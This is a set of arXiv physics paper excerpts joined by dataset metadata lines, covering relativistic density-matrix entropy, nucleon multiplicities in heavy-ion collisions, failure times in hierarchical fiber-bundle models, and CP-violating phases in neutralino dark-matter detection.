\rho_{\eta}(z,z') = \int \psi_{\eta}(z,t)
\left\{\psi_{\eta}(z',t)\right\}^{*} dt
= \left(1 - \beta^{2}\right)\sum^{}_{k}
\beta^{2k}\phi_{k}(z)\phi^{*}_{k}(z') .
\end{equation}
It is of course possible to compute the above integral using the
analytical expression given in Eq.(\ref{14}). The result is
\begin{equation}
\rho_{\eta}(z,z') = \left({1\over \pi \cosh 2\eta} \right)^{1/2}
\exp\left\{-{1\over 4}[(z + z')^{2}/\cosh 2\eta
+ (z - z')^{2}\cosh 2\eta] \right\} .
\end{equation}
This form of the density matrix satisfies the trace condition
\begin{equation}
\int \rho(z,z) dz = 1 .
\end{equation}
The trace of this density matrix is one, but the trace of $\rho^{2}$ is
less than one, as
\begin{equation}
Tr\left(\rho^{2}\right) = \int \rho^{n}_{\eta}(z,z')
\rho^{n}_{\eta}(z',z) dz'dz
= \left(1 - \beta^{2}\right)^{2} \sum^{}_{k} \beta^{4k} ,
\end{equation}
which is less than one and is $1/\left(1 + \beta^{2}\right)$. This is
due to the fact that we do not know how to deal with the time-like
separation in the present formulation of quantum mechanics. Our
knowledge is less than complete.
The standard way to measure this ignorance is to calculate the
entropy defined as~\cite{neu32,wiya63}
\begin{equation}
S = - Tr\left(\rho\ln(\rho)\right) .
\end{equation}
If we pretend to know the distribution along the time-like
direction and use the pure-state density matrix given in Eq.(\ref{pure}),
then the entropy is zero. However, if we do not know how to deal with
the distribution
along $t$, then we should use the density matrix of Eq.(\ref{densi}) to
calculate the entropy, and the result is~\cite{kiwi90pl}
\begin{equation}
S = 2 [(\cosh\eta)^{2}\ln (\cosh\eta) - (\sinh\eta)^{2}\ln(\sinh\eta)] .
\end{equation}
In terms of the velocity parameter, this expression can be written as
\begin{equation}
S = {1\over 1 - \beta^{2}}\ln{1\over 1 - \beta^{2}} -
{\beta \over 1 - \beta^{2}}\ln{\beta \over 1 - \beta^{2}} .
\end{equation}
From this we can derive the hadronic temperature~\cite{hkn90pl}.
In this report, the time-separation variable $t$ played the role of
an unmeasurable variable. The use of an unmeasurable variable as
a ``shadow'' coordinate is not new in physics and is of current
interest~\cite{ume82}. Feynman's book on statistical mechanics
contains the following paragraph~\cite{fey72}.
{\it When we solve a quantum-mechanical problem, what we really do
is divide the universe into two parts - the system in which we are
interested and the rest of the universe. We then usually act as if
the system in which we are interested comprised the entire universe.
To motivate the use of density matrices, let us see what happens
when we include the part of the universe outside the system.}
In the present paper, we have identified Feynman's rest of the
universe as the time-separation coordinate in a relativistic two-body
problem. Our ignorance about this coordinate leads to a density matrix
for a non-pure state, and consequently to an increase of entropy.
| 2024-02-18T23:40:12.861Z | 1998-11-16T17:30:39.000Z | algebraic_stack_train_0000 | 1,672 | 3,660 |
|
proofpile-arXiv_065-8314 | \section{Introduction}
The correlation of mean multiplicity with some trigger is the
important problem of high energy heavy ion physics. For example,
the $J/\psi$ suppression can be explained at least partially
\cite{CKKG,ACF} by their
interactions with co-moving hadrons, and for the numerical
calculations we should know the multiplicity of comovers namely
in events with $J/\psi$ production.
In the present paper we give some results for the dependences of
the number of interacting nucleons and the multiplicity of produced
secondaries on the impact parameter. These results are based practically
only on geometry, and do not depend on the model of interaction. In the
case of minimum bias interactions the dispersion of the distribution on
the number of interacting nucleons (which is similar to the
distributions on the transverse energy, multiplicity of secondaries,
etc.) is very large. This allows in principle to have a significant
dependence of some characteristic of the interaction, say, mean
multiplicity of the secondaries, on the used trigger. On the other hand,
in the case of central collisions the discussed dispersion is small that
should result in weak dependence on any trigger.
We consider the high energy nucleus-nucleus collision as a superposition
of the independent nucleon-nucleon interactions. So our results can be
considered also as a test for search the quark-gluon plasma formation.
In the case of any collective interactions, including the case of
quark-gluon plasma formation we can not see any reason for existance the
discussed ratios. We present an estimation of possible violation which
is based on the quark-gluon string fusion calculations.
\section{Distributions on the number of interacting nucleons
for different impact parameters}
Let us consider the events with secondary hadron production in
nuclei A and B minimum bias collisions. In this case the average number
of inelastically interacting nucleons of a nucleus A is equal \cite{BBC}
to
\begin{equation}
<N_A>_{m.b.} = \frac{A \sigma^{prod}_{NB}}{\sigma^{prod}_{AB}} \;.
\end{equation}
If both nuclei, A and B are heavy enough, the production cross sections
of nucleon-nucleus and nucleus-nucleus collisions can be written as
\begin{equation}
\sigma^{prod}_{NB} = \pi R_B^2 \;,
\end{equation}
and
\begin{equation}
\sigma^{prod}_{AB} = \pi (R_A + R_B)^2 \;.
\end{equation}
It is evident that in the case of equal nuclei, A = B,
\begin{equation}
<N_A>_{m.b.} = A/4 \;.
\end{equation}
So in the case of minimum bias events the average number of
interacting nucleons should be four times smaller than in the
case of central collisions, where $<N_A>_c \approx A$.
For the calculation of the distribution over the number of
inelastically ineracting nucleons of A nucleus we will use the
rigid target approximation \cite{Alk,VT,PR}, which gives the
probability of $N_A$ nucleons interaction as \cite{GCSh,BSh}
\begin{equation}
V(N_A) = \frac{1}{\sigma^{prod}_{AB}} \frac{A!}{(A-N_A)! N_A!}
\int d^2 b [I(b)]^{A-N_A} [1-I(b)]^{N_A} \;,
\end{equation}
where
\begin{equation}
I(b) = \frac{1}{A} \int d^2 b_1 T_A(b_1-b)
\exp {- \sigma^{inel}_{NN}T_B(b_1)]} \;,
\end{equation}
\begin{equation}
T_A(b) = A \int dz \rho (b,z) \;.
\end{equation}
Eq. (5) is written for minimum bias events. In the case of events
for some interval of impact parameter $b$ values, the integration
in Eq. (5) should be fulfilled by this interval,
$b_{min} < b < b_{max}$. In particular, in the case of central
collisions the integration should be performed with the condition
$b \leq b_0$, and $b_0 \ll R_A$.
The calculated results for averaged values of the number of inelastic
interacting nucleons of the projectile nucleus, $<N_{in}>$ are presented
in Fig. 1, as the functions of impact parameter $b$ for the cases of
$Pb-Pb$ collisions at three different energies (we define $\sqrt{s}$ =
$\sqrt{s_{NN}}$ as the c.m.energy for one nucleon-nucleon pair), and for
$S-U$ collisions at $\sqrt{s_{NN}}$ = 20 GeV. One can see very
weak energy dependence of these distributions on the initial energy,
which appears in our approach only due to the energy dependence of
$\sigma_{NN}^{inel}$.
In the case of the collisions of equal heavy ions ($Pb-Pb$ in our case)
at zero impact parameter, about 6\% of nucleons from every nucleus do
not interact inelastically at energy $\sqrt{s_{NN}}$ = 18 GeV. More
accurate, we obtain on the average 11.8 non-interacting nucleons at this
energy, that is in agreement with the value $13 \pm 2$ nucleons
\cite{Alb}, based on the VENUS 4.12 \cite{Kla} model prediction. The
number of non-interacting nucleons decreases to the value about 3\% at
$\sqrt{s_{NN}}$ = 5.5 TeV. This is connected with the fact that the
nucleons at the periphery of one nucleus, which are overlapped with the
region of small density of nuclear matter at the periphery of another
nucleus, have large probability to penetrate without inelastic
interaction. It is clear that this probability decrease with increase of
$\sigma_{NN}^{inel}$, that results in the presented energy dependence.
The value of $<\!N_{in}\!>$ decreases with increase of the impact
parameter because even at small $b \neq 0$ some regions of colliding
ions are not overlapping.
In the case of different ion collisions, say $S-U$, at small impact
parameters all nucleons of light nucleus go throw the regions of
relatively high nuclear matter density of heavy nucleus, so
practically all these nucleons interact inelastically. For the case of
$S-U$ interactions at $\sqrt{s_{NN}}$ = 20 GeV it is valid for
$b < 2\div 3$ fm.
It is interesting to consider the distributions on the number of
inelastically interacting nucleons at different impact parameters.
The calculated probabili\-ties to find the given numbers of
inelastically interacting nucleons for the case of minimum bias $Pb-Pb$
events are presented in Fig. 2a. The average value, $<N_{in}>$ = 50.4
is in reasonable agreement with Eq. (4). The disagreement of the order
of 3\% can be connected with different values of effective nuclear radii
in Eqs. (2) and (3). The dispersion of the distribution on $N_{in}$ is
very large.
The results of the same calculations for different regions of impact
parame\-ters are presented in Fig. 2b, where we compare the cases of the
central ($b < 1$ fm), peripheral (12 fm $< b <$ 13 fm) and intermediate
(6 fm $< b <$ 7 fm) collisions. One can see that the dispersions of all
these distributions are many times smaller in comparison with the
minimum bias case, Fig. 2a.
In the cases of the central and peripheral interactions, the
distributions over $N_{in}$ are significantly more narrow than in the
intermediate case. The reason is that in the case of central collision
the number of nucleons at the periphery on one nucleus, which have the
probabilities to interact or not of the same order, is small enough.
In the case of very peripheral collision the total number of nucleons
which can interact is small. However, in the intermediate case the
comparatively large number of nucleons of one nucleus go via
peripheral region of another nucleus with small nuclear matter density,
and every of these nucleons can interacts or not.
\section{Ratio of secondary hadron multiplicities in the central
and minimum bias heavy ion collisions}
Let us consider now the multiplicity of the produced secondaries in the
central region. First of all, it should be proportional to the number of
interacting nucleons of projectile nucleus. It should depends also on
the average number, $<\! \nu_{NB} \!>$, of inelastic interactions of
every projectile nucleon with the target nucleus. At asymptotically
high energies the mean multiplicity of secondaries produced in
nucleon-nucleus collision should be proportional to $<\! \nu\! >$
\cite{Sh1,CSTT}. As was shown in \cite{Sh}, the average number of
interactions in the case of central nucleon-nucleus collisions,
$<\! \nu \!>_c$, is approximately 1.5 times larger than in the case of
minimum bias nucleon-nucleus collisions, $<\! \nu \!>_{m.b.}$. It means
that the mean multiplicity of any secondaries in the central heavy ion
collisions (with A = B), $<\! n\!>_c$ should be approximately 6 times
larger than in the case of minimum bias collisions of the same nuclei,
$<\! n \!>_{m.b.}$, $<\! n \!>_c \approx 6 <\! n \!>_{m.b.}$. Of course,
this estimations is valid only for secondaries in the central region of
inclusive spectra.
There exist several corrections to the obtained result. At existing
fixed target energies the multiplicity of secondaries is proportional
not to $<\! \nu \!>$, but to $\frac{1 + <\nu>}{2}$ \cite{CSTT,CCHT}.
For heavy nuclei the values of $<\! \nu \!>_{m.b.}$ are about
$3 \div 4$. It means, that the $<\nu_{NB}>_c$ to $<\nu_{NB}>_{m.b.}$
ratio equal to 1.5 will results in enhancement factor about 1.4 for the
multiplicity of secondaries. More important correction comes from the
fact that in the case of central collision of two nuclei with the same
atomic weights, only a part of projectile nucleons can interact with the
central region of the target nucleus. It decrease the discussed
enhancement factor to, say, 1.2. As it was presented in the previous
Sect., even in central collisions (with zero impact parameter) of equal
heavy nuclei, several percents of projectile nucleons do not interact
with the target because they are moving through the diffusive region of
the target nucleus with very small density of nuclear matter.
As a result we can estimate our prediction
\begin{equation}
<\! n \!>_c \sim 4.5 <\! n \!>_{m.b.} \;.
\end {equation}
In the case of quark-gluon plasma formation or some another collective
effects we can not see the reason for such predictions. For example,
the calculation of $<n>_c$ and $<n>_{m.b.}$ with account the string
fusion effect \cite{USC} violate Eq. (8) on the level of 40\% for the
case of $Au-Au$ collisions at RHIC energies.
Moreover, in the conventional approach considered here, we obtain the
prediction of Eq. (8) for any sort of secondaries including pions,
kaons, $J/\psi$, Drell-Yan pairs, direct photons, etc. Let us imagine
that the quark-gluon plasma formation is possible only at comparatively
small impact parameters (i.e. in the central interactions). In this case
Eq. (8) can be strongly violated, say, for direct photons and, possibly,
for light mass Drell-Yan pairs, due to the additional contribution to
their multiplicity in the central events via thermal mechanism. At the
same time, Eq. (8) can be valid, say, for pions, if the most part of
them is produced at the late stage of the process, after decay of the
plasma state. So the violation of Eq. (8) for the particles which can
be emitted from the plasma state should be considered as a signal for
quark-gluon plasma formation. Of course, the effects of final state
interactions, etc. should be accounted for in such test.
It was shown in Ref. \cite{DPS} that the main contribution to the
dispersion of multiplicity distribution in the case of heavy ion
collisions comes from the dispersion in the number of nucleon-nucleon
interactions. The last number is in strong correlation
with the value of impact parameter.
For the normalized dispersion $D/<\! n \!>$, where
$D^2 = <\! n^2 \!> - <\! n \!>^2$
we have \cite{DPS}
\begin{equation}
\frac{D^2}{<\! n \!>^2} =
\frac{\nu_{AB}^2 - <\nu_{AB}>^2}{<\nu_{AB}>^2}
+ \frac{1}{<\nu_{AB}>} \frac{d^2}{\overline{n}^2} \;,
\end {equation}
where $<\nu_{AB}> = <\! N_A \!> \cdot <\nu_{NB}>$ is the average number
of nucleon-nucleon interactions in nucleus-nucleus collision,
$\overline{n}$ and $d$ are the average multiplicity and the dispersion
in one nucleon-nucleon collision.
In the case of heavy ion collisions $<\nu_{AB}> \sim 10^2 - 10^3$,
so the second term in the right hand side of Eq. (9) becomes negligible
\cite{DPS}, and the first term, which is the relative dispersion in the
number of nucleon-nucleon interactions, dominates. In the case of
minimum bias A-B interaction the last dispersion is comparatively large
due to large dispersion in the distribution on $N_A$, see Fig. 2a. So in
the case of some trigger (say, $J/\psi$ production) without fixing of
the impact parameter, the multiplicity of secondaries can change
significantly in comparison with its average value. In the case of some
narrow region of impact parameters the dispersion in the distribution on
$N_A$ is many times smaller, as one can see in Fig. 2b, especially in
the case of central collisions. The dispersion in the number of
inelastic interactions of one projectile nucleon with the target
nucleus, $\nu_{NB}$, should be the same or slightly smaller in
comparison with the minimum bias case. So the dispersion in the
multiplicity of secondaries can not be large. It means that any trigger
can not change significantly the average multiplicity of secondaries in
the central heavy ion collisions, even if this trigger strongly
influents on the multiplicity in the nucleon-nucleon interaction.
\section{Conclusions}
We calculated the distributions on the number of interacting nucleons
in heavy ion collisions as the functions of impact parameters. The
dispersions of these distributions are very small for the central and
very peripheral interactions and significantly larger for
intermediate values of impact parame\-ters.
We estimated also the ratio of mean multiplicities of secondaries in
minimum bias and central collisions, which can be used for search of
quark-gluon plasma formation. We presented that in the case of
central collisions any trigger can not change significantly (say,
more than 10-15\%) the average multiplicity. This fact can be used
experimentally to distinguish collective effects on $J/\psi$ production
like quark-gluon plasma from more conventional machanisms.
In conclusion we express our gratitude to A.Capella and A.Kaidalov
for useful discussions. We thank the Direcci\'on General de
Pol\'{\i}tica Cient\'{\i}fica and the CICYT of Spain for financial
support. The paper was also supported in part by grant NATO OUTR.LG
971390.
\newpage
\begin{center}
{\bf Figure captions}\\
\end{center}
Fig. 1. Average numbers of inelastically interected nucleons in
$Pb-Pb$ and $S-U$ collisions at different energies as the functions of
impact parameter.
Fig. 2. Distributions on the numbers of inelastically interected
nucleons in $Pb-Pb$ collisions at $\sqrt{s_{NN}} = 18$ GeV for minimum
bias (a) interactions and for different regions of impact parameter (b).
\newpage
| 2024-02-18T23:40:13.189Z | 1998-11-02T13:45:18.000Z | algebraic_stack_train_0000 | 1,704 | 2,406 |
|
proofpile-arXiv_065-8326 | \section{First-level heading:}
There are few mechanical problems more complex and difficult to cast
into a definite physical and theoretical treatment than the range of
phenomena associated with fracture. Furthermore, there are few
problems with a wider field of application: material science,
engineering, rock mechanics, seismology and earthquake occurrence. Our
understanding of fracture processes in heterogeneous materials has
recently improved with the development of simple deterministic and
stochastic algorithms to simulate the process of quasistatic loading
and static fatigue \cite{herrman90}. The load-transfer models used
here are called fiber-bundle models, because they arose in close
connection with the strength of bundles of textile fibers. Since
Daniels' and Coleman's \cite{daniels45} seminal works, there has been
a long tradition in the use of these models to analyze failure of
heterogeneous materials \cite{harlow78}. Fiber-bundle models differ by
how the load carried by a failed element is distributed among the
surviving elements in the set. In the simplest scheme, called ELS for
equal load sharing, the load supported by failed elements is shared
equally among all surviving elements. Important from the geophysical
point of view is the hierarchical load-sharing (HLS) rule introduced
by Turcotte and collaborators in the seismological literature
\cite{smalley85}. In this load-transfer modality the scale invariance
of the fracture process is directly taken into account by means of a
scheme of load transfer following the branches of a fractal (Cayley)
tree with a fixed coordination number $c$. The HLS geometry nicely
simulates the Green's function associated with the elastic
redistribution of stress adjacent to a rupture. In the static case,
the strength of an HLS system tends to zero as the size of the system,
$N$, approaches infinity, though very slowly, as
\( 1/log(log N)\) \cite{newman91}. The dynamic HLS model was introduced
in the geophysical literature in reference \cite{newman94}; their
specific aim was to find out if the chain of partial failure events
preceding the total failure of the set resemble a log-periodic
sequence \cite{sornette95}. In the analysis of \cite{newman94}, it
appeared that, contrary to the static model, the dynamic HLS model
seemed to have a non-zero time-to-failure as the size of the system
tends to infinity. In this paper we provide evidence that this
conjecture is true by means of an exact algebraic iterative method
where trees of
\(n\) levels, $N=c^n$, are solved using the information acquired in the previous
calculation of trees of \(n-1\) levels. As a byproduct of this method,
we obtain a rigorous lower bound for the time to failure of infinite
size sets which results in being non-zero.
In \cite{gomez98} we showed how in fiber-bundle dynamical models,
using a Weibull exponential shape function and a power-law breaking
rule, one can devise a probabilistic approach which is equivalent to
the usual approach \cite{newman94} where the random lifetimes are
fixed at the beginning and the process evolves deterministically.
Without loss of generality, from the probabilistic perspective the set
of elements with initial individual loads \(\sigma=\sigma_0=1\) and
suffering successive casualties is equivalent to an inhomogeneous
sample of radioactive nuclei each with a decay width
\(\sigma^{\rho}\); \(\rho\) being the so called Weibull index, which
in materials science adopts typical values between 2 and 10. As time
passes and failures occur, loads are transferred,
\(\sigma\) changes and the decay width of the surviving elements grow.
In the probabilistic approach, in each time step defined as:
\begin{equation}
\delta=\frac{1}{\sum\limits_{j}\sigma_{j}^{\rho}}\quad ,
\label{one}
\end{equation}
one element of the sample decays. The index \(j\) runs along all the
surviving elements. The probability of one specific element,
\(m\), to fail is \(p_{m}=\sigma_{m}^{\rho} \delta\). Eq.\ (\ref{one}) is the ordinary
link between the mean time interval for one element to decay in a
radioactive sample and the total decay width of the sample as defined
above. Due to this analogy, radioactivity terms will frequently be
used in this communication. Note that we use loads and times without
dimensions. The time to failure, \(T\), of a set is the sum of the
\(N\)
\(\delta\)s. For the ELS case, the value of \(\delta\) as defined in
Eq.\ (\ref{one}) easily leads to $T=1/\rho$, which is the correct
result for the time to failure of an infinite ELS set \cite{newman94}.
In this communication we will apply these ideas to the HLS case
obtaining the
\(\delta\)s algebraically without having to use Monte Carlo
simulations.
To give a perspective of what is going on in the rupture process of a
hierarchical set we have drawn in Fig.\ \ref{figure1} the three
smallest cases for trees of coordination \(c=2\). Denoting by
\(n\) the number of levels, or height of the tree, i.e.
\(N=2^{n}\), we have considered \(n=0,1\) and
\(2\). The integers within parenthesis
\((r)\) account for the number of failures existing in the tree. When
there are several non-equivalent configurations corresponding to a
given
\(r\), they are labeled as \((r,s)\), i.e, we add a new index $s$.
The total load is conserved except at the end, when the tree
collapses. Referring to the high symmetry of loaded fractal trees,
note that each of the configurations explicitly drawn in Fig.\
\ref{figure1} represents all those that can be brought to coincidence
by the permutation of two legs joined at an apex, at any level in the
height hierarchy. Hence we call them non-equivalent configurations or
merely configurations. In general, each configuration $(r,s)$ is
characterized by its probability $p(r,s)$, $\sum\limits_{s}p(r,s)
=1$, and its decay width $\Gamma(r,s)$. The time step for one-element
breaking at the stage $r$, is given by
\begin{equation}
\delta_{r}=\sum\limits_{s}p(r,s)\frac{1}{\Gamma(r,s)} \label{two}
\end{equation}
This is the necessary generalization of Eq.\ (\ref{one}) due to the
appearance of non-equivalent configurations for the same $r$ during
the decay process of the tree. In cases of branching, the probability
that a configuration chooses a specific direction is equal to the
ratio between the partial decay width in that direction and the total
width of the parent configuration. We will compute at a glance the
\(\delta\)s of Fig.\ \ref{figure1} in order to later analyze the general
case. To be specific, we will always use \(\rho=2\). For
\(n=0\), we have $\Gamma(0)=1^{2}$ and \(\delta_{0}=\frac{1}{1^{2}}=1=T\).
For \(n=1\), \(\Gamma(0)=1^{2}+1^{2}=2\), $\delta_{0}=\frac{1}{2}$,
\(\Gamma(1)=2^{2}\), $\delta_{1}=\frac{1}{4}$ and hence \(T=\frac{1}{2}+\frac{1}{4}=\frac{3}{4}\). For \(n=2\),
\(\Gamma(0)=1^{2}+1^{2}+1^{2}+1^{2}=4\), \(\delta_{0}=\frac{1}{4}\),
\(\Gamma(1)=2^{2}+1^{2}+1^{2}=6\), $\delta_{1}=\frac{1}{6}$; now we face a branching,
the probability of the transition $(1)\rightarrow(2,1)$ is
$\frac{4}{6}$ and the probability of the transition
$(1)\rightarrow(2,2)$ is $\frac{2}{6}$, on the other hand
$\Gamma(2,1)=2^{2}+2^{2}=8=\Gamma(2,2)$, hence
$\delta_{2}=\frac{4}{6}\cdot\frac{1}{8}+\frac{2}{6}\cdot\frac{1}{8}=\frac{1}{8}$.
Finally $\delta_{3}=\frac{1}{16}$ and the addition of $\delta$s gives
$T=\frac{29}{48}$.
Now we define the replica of a configuration belonging to a given
\(n\), as the same configuration but with the loads doubled (this is
because we are using \(c=2\)). The replica of a given configuration
will be recognized by a prime sign. In other words $(r,s)'$ is the
replica of $(r,s)$. Any decay width, partial or total, related to
$(r,s)'$ is automatically obtained by multiplying the corresponding
value of $(r,s)$ by the common factor $c^{\rho}=2^{\rho}=4$. This is a
consequence of the power-law breaking rule assumed. The need to define
the replicas stems from the observation that any configuration
appearing in a stage of breaking $r$ of a given
\(n\), can be built as the juxtaposition of two configurations of
the level
\(n-1\), including also the replicas of the level $n-1$ as ingredients of the
game. In Fig.\ \ref{figure1}, one can observe the explicit structure
of the configurations of $N=4$ as a juxtaposition of those of $N=2$
and its replicas. From this perspective we notice that as the
configurations for the height $n$ are formed by juxtaposing two
configurations of the already solved height $n-1$ and its replicas,
with the restriction that the total load must be equal to $2^n$
because the total load is conserved, the single-element breaking
transitions occurring can only be of three types. One case a)
corresponds to the breaking of one element in a half of the tree while
the other half remains as an unaffected spectator. Another case b)
corresponds to the decay of the last surviving element in a half of
the tree, which provokes its collapse and the corresponding doubling
of the load borne by the other half. Finally, the third case c)
corresponds to the scenario in which one half of the tree has already
collapsed and in the other half one break occurs. In this third case
the decay width is obtained from the information of the replicas. This
holds for any height $n$, allows the computation of all the partial
decay widths in a tree of height $n$ from those obtained in the height
$n-1$ and will be illustrated in Fig.\ \ref{figure3}.
Using henceforth a convenient symbolic notation, in Fig.\
\ref{figure2}a we have built what we call the primary width diagram
for $n=3$ resulting from the juxtapositions of pairs of configurations
of the previous diagram of $n=2$ and its replicas. It is implicitly
understood that time flows downward along with the breaking process.
In Fig.\ \ref{figure2}a the boxes represent $n=3$ configurations, and
at their right, the two quantities in parentheses indicate the two
$n=2$ configurations forming them. The value of the partial width
connecting a parent and a daughter is written at the end of the
corresponding arrow. The sum of all the partial widths of a parent
configuration in a branching is always equal to the total decay width,
$\Gamma$, of the parent. From this primary width diagram one deduces
the probability of any primary configuration at any stage $r$ of
breaking, and consequently $\delta_{r}$ is obtained using Eq.\
(\ref{two}). Finally, by adding all the $\delta$s we calculate
$T(n=3)$. To illustrate the connection between the explicit
configurations as those of Fig.\ \ref{figure1} and the somewhat
hermetic notation of Fig.\ \ref{figure2}, in Fig.\ \ref{figure3}, we
have shown three explicit examples relating them. Fig.\ \ref{figure3}
is selfexplanatory. The three examples correspond to the cases a), b)
and c) mentioned before.
By iterating this procedure, that is by forming the primary diagram of
the $n+1$ height by juxtaposing the configurations of the primary
diagram of the height $n$, we can, in principle, exactly obtain the
total time to failure of trees of successively doubled size. Two
examples are $T(n=3)=\frac{63451}{123200}$ and
$T(n=4)=\frac{21216889046182831}{46300977698976000}$. The problem
arises from the vast amount of configurations one has to handle in the
successive primary diagrams. This fact eventually blocks the
possibility of obtaining exact results for trees high enough as to be
able to gauge the asymptotic behavior of $T$ in HLS sets. That is why,
taking advantage of the general perspective gained with the exact
algebraic method, henceforth our more modest goal will be to set
rigorous bounds for $T$. This task is much simpler.
To set bounds, we will define effective diagrams in which for each $r$
there is only one configuration which results from fusing in some
specific appropriate way all the configurations labeled by the
different $s$ values; see Fig.\ \ref{figure2}b. These effective
configurations are connected by effective decay widths denoted by
$a_r$. Thus, the effective diagram for any $n$ is calculated from its
primary diagram, and then is used to build a primary diagram of the
next height $n+1$. For $n=0$, 1 and 2, $a_r=\Gamma(r)$ because
$\forall r$, the $\Gamma(r,s)$ are equal to a unique value
$\Gamma(r)$. The point is how to define $a_r$ for $n\ge 3$, so that
all the $\delta(r)(n\ge4)$ and hence $T(n\ge4)$ are systematically
lower (or higher) than its exact result. This goal is easily
accomplished using,
\begin{equation}
a_r=\Gamma_{max}(r)\qquad (or\quad \Gamma_{min}(r)) \label{three}
\end{equation}
i.e., by assuming that the configuration of maximum (minimum) width
saturates the single element decay of the stage $r$. Better rigorous
boundings are obtained using the geometric mean (or the harmonic
mean), namely
\begin{equation}
a_r=\prod\limits_{s}\Gamma(r,s)^{p(r,s)}\qquad (or\quad
\frac{1}{\sum\limits_{s}p(r,s)\frac{1}{\Gamma(r,s)}})
\label{four}
\end{equation}
The bounds obtained from these formulae are plotted in Fig.\
\ref{figure4}. It is clear that those based on Eq.\ (\ref{three}) are
poor, in fact the lower bound goes quickly to zero. On the other hand,
those based on Eq.\ (\ref{four}) are stringent and useful. The value
obtained for the lower (higher) bound to $T$, from Eq.\ (\ref{four}),
will be called $T_l$ $(T_h)$. The arithmetic mean, i.e.,
$a_r=\sum\limits_{s}p(r,s)\cdot\Gamma(r,s)$ also leads to a lower
bound but it is not as good as that coming from the geometric mean.
The bounds emerging from these three means are rigorous because when
configurations of different decay width are fused, the form of the
generated function appearing in the calculus of the $\delta$s are
concave (convex). This will be explained elsewhere.
We have fitted the data points of $T_l$ by an exponential function of
the form \(T_{l}=T_{l,\infty}+a e^{-b(n-n_{0})}\),
\(T_{l,\infty}\), \(a\), \(b\) and \(n_{0}\) being fitting parameters.
The success of this fitting is crucial because this exponential decay
to a non-zero limit is the hallmark of our claim. By choosing subsets
formed only by points representing big systems we observe a clear
saturation of the asymptotic time-to-failure towards
\(T_{l,\infty}=0.32537\pm0.00001\). An analogous analysis of $T_h$
leads to $T_{h,\infty}=0.33984\pm0.00001$. Similar fittings of the
Monte Carlo data points are inconclusive, due to the intrinsic
noisiness of the MC results and the limited size of the simulated sets
($N<2^{16}$ elements). What this result implies is that a system with
a hierarchical scheme of load transfer and a power-law breaking rule
$(c=2,\rho=2)$ has a time-to-failure for sets of infinite size,
$T_{\infty}$, such that $0.32537 \leq T_{\infty} \leq 0.33984$. Thus,
there is an associated zero-probability of failing for $T<T_{\infty}$
and a probability equal to one of failing for
\(T>T_{\infty}\). The critical point behavior is thus confirmed.
Invoking conventional universality arguments one deduces that this
property holds for a hierarchical structure of any coordination. The
case of dynamical HLS sets using an exponential breaking rule will be
reported shortly.
A.F.P is grateful to J. As\'{\i}n, J.M. Carnicer and L. Moral for
clarifying discussions. M.V-P. thanks Diego V\'{a}zquez-Prada for
discussions. Y.M thanks the AECI for financial support. This work was
supported in part by the Spanish DGICYT.
| 2024-02-18T23:40:13.225Z | 1998-12-30T11:37:31.000Z | algebraic_stack_train_0000 | 1,705 | 2,653 |
|
proofpile-arXiv_065-8334 | \section{ INTRODUCTION}
Supersymmetric theories with R parity conservation imply the
existence of a lowest mass supersymmetric particle (LSP) which is
absolutely stable\cite{jungman}. In supergravity models\cite{applied}
with R parity invariance one finds that over
a majority of the parameter space the LSP is the lightest neutralino,
and thus the neutralino becomes
a candidate for cold dark matter (CDM) in the universe. A great deal
of dark matter exists in the halo of our galaxy and estimates of the
density of dark matter in our solar neighborhood give densities of
0.3GeV/cm$^3$ and particle velocities of $\approx 320 kms^{-1}$.
One of the interesting suggestions regarding the detection of dark
matter is that of direct detection via scattering of neutralinos
from target nuclei in terrestrial detectors\cite{good}.
Considerable progress has
been made in both technology of detection\cite{santa} as well as in accurate
theoretical predictions of the expected event rates in detectors such
as Ge, NaI, CaF$_2$, and Xe\cite{flores,drees,events,arno}.
In this paper we discuss the effects of CP violating phases in
supersymmetric theories on event rates in the scattering of neutralinos
off nuclei in terrestrial detectors. Such effects are negligible if
the CP violating phases are small. Indeed the stringent experimental
constraints on the EDM of the neutron\cite{altra} and of the
electron \cite{commins} would seem to require
either small CP violating phases\cite{bern}
or a
heavy supersymmetric particle
spectrum\cite{na}, in the range of several TeV, to satisfy the experimental
limits on the EDMs. However, a heavy sparticle spectrum also
constitutes fine tuning\cite{ccn} and further a heavy
spectrum in the range of several TeV will put the supersymmetric
particles beyond the reach of even the LHC.
Recently a new possibility was proposed\cite{in1,in2,correction},
i.e., that of internal cancellations among the various components
contributing to
the EDMs which allows for the existence of large CP violating phases,
with a SUSY spectrum which is not excessively heavy and is thus accessible
at colliders in the near future.
CP violating phases O(1) are attractive
because they circumvent the naturalness problem associated with small
phases or a heavy SUSY spectrum.
The EDM analysis of Ref.\cite{in1} was for the minimal supergravity model
which has only two CP violating phases. The analysis of
Ref.\cite{in1} was extended in Ref.\cite{in2} to take account of
all allowed
CP violating phases in the Minimal Supersymmetric Standard Model (MSSM)
with no generational mixing. This extension gives
the possibility of the cancellation mechanism to occur over a
much larger region of the parameter space allowing for
large CP violating phases over this region. Indeed a general numerical
analysis bears this out\cite{bgk}.
Large CP violating phases can affect significantly
dark matter analyses and other phenomena at low
energy\cite{falk1,bk,falk2,falk3}. A detailed analysis in Ref.\cite{falk2}
shows that large CP violating phases consistent with the cosmological
relic density constraints and the EDM constraints using the
cancellation mechanism are indeed
possible. CP violating phases affect event rates in dark
matter detectors and a partial analysis of these
effects with two CP phases and without the EDM
constraint was given
in Ref.\cite{falk3}.
Thus, currently there are no analyses where the effect of large
CP violating phases on event rates and the simultaneous satisfaction
of the EDM constraints via the cancellation mechansim are discussed.
Further, the previous analyses are all limited to two CP violating
phases while supergravity models with non-universalities and MSSM
can possess many more phases\cite{in2}.
In this paper we give the first complete analytic analysis of the effects of
CP violation on event rates with the inclusion of all CP
violating phases allowed in the minimal supersymmetric standard
model (MSSM) when intergenerational
mixings are ignored. We then give a numerical analysis of the
CP violating effects on event rates with the inclusion of the EDM constraints.
It is shown that while the effects of CP violating phases on event rates
are significant with the inclusion of the EDM constraints, they are not
enormous as for the case when the EDM constraints are ignored.
We discuss now the details of the analysis in MSSM. The nature of the
LSP at the electro-weak scale is determined by the neutralino
mass matrix which in the basis ($\tilde B$, $\tilde W$, $\tilde H_1$,
$\tilde H_2$), where $\tilde B$ and $\tilde W$ are the U(1) and
the neutral SU(2) gauginos, is given by
\begin{equation}
\left(\matrix{|\m1|e^{i\xi_1}
& 0 & -M_z\sin\theta_W\cos\beta e^{-i\chi_1} & M_z\sin\theta_W\sin\beta e^{-i\chi_2} \cr
